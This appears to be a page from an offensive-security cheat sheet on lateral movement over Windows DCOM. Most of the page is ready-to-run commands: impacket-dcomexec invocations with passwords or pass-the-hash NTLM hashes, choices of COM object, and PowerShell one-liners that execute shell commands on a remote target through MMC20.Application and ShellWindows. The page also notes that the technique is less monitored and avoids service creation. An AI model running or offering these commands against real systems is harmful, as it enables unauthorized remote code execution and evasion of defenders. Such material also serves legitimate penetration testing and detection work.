Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

DCOM (Distributed Component Object Model) allows remote COM object interaction. Several COM objects support command execution. Uses port 135 + dynamic high ports.

Impacket — dcomexec

impacket-dcomexec DOMAIN/user:password@TARGET
impacket-dcomexec DOMAIN/user@TARGET -hashes :NTLM_HASH
impacket-dcomexec DOMAIN/user:password@TARGET "whoami"

Specify Object

impacket-dcomexec -object MMC20 DOMAIN/user:password@TARGET
impacket-dcomexec -object ShellWindows DOMAIN/user:password@TARGET
impacket-dcomexec -object ShellBrowserWindow DOMAIN/user:password@TARGET

PowerShell — MMC20.Application

$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "TARGET"))
$com.Document.ActiveView.ExecuteShellCommand("cmd", $null, "/c whoami > C:\temp\out.txt", "7")

PowerShell — ShellWindows

$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39", "TARGET"))
$com.item().Document.Application.ShellExecute("cmd.exe", "/c whoami > C:\temp\out.txt", "C:\Windows\System32", $null, 0)

Advantages

  • Less monitored than SMB-based tools
  • No service creation
  • No binary upload
  • Different network signature than PsExec/WMI

Requirements

  • Admin rights on target
  • RPC (135) + dynamic high ports accessible
  • DCOM enabled on target

Quick Reference

TaskCommand
Shellimpacket-dcomexec DOMAIN/user:pass@TARGET
PtHimpacket-dcomexec DOMAIN/user@TARGET -hashes :HASH
MMC20-object MMC20
ShellWindows-object ShellWindows